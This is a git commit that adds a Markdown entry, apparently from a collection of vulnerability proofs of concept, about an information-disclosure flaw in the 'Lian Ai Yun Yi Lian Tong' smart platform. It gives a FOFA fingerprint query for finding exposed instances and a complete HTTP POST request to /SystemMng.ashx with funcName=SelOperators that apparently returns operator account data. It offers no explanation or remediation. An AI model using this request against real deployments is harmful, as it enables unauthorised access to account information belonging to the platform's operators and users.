Create 脸爱云一脸通智慧平台SelOperators信息泄露漏洞.md
This commit is contained in:
parent
3b4c90ed07
commit
49a154acbf
24
脸爱云一脸通智慧平台SelOperators信息泄露漏洞.md
Normal file
24
脸爱云一脸通智慧平台SelOperators信息泄露漏洞.md
Normal file
@ -0,0 +1,24 @@
|
||||
## 脸爱云一脸通智慧平台SelOperators信息泄露漏洞
|
||||
|
||||
## fofa
|
||||
```
|
||||
body="View/UserReserved/UserReservedTest.aspx"
|
||||
```
|
||||
|
||||
## poc
|
||||
```
|
||||
POST /SystemMng.ashx HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 36
|
||||
Accept: application/json, text/javascript, */*; q=0.01
|
||||
X-Requested-With: XMLHttpRequest
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: zh-CN,zh;q=0.9
|
||||
Connection: close
|
||||
|
||||
username=admin&funcName=SelOperators
|
||||
```
|
||||
|
||||

|
||||
Loading…
x
Reference in New Issue
Block a user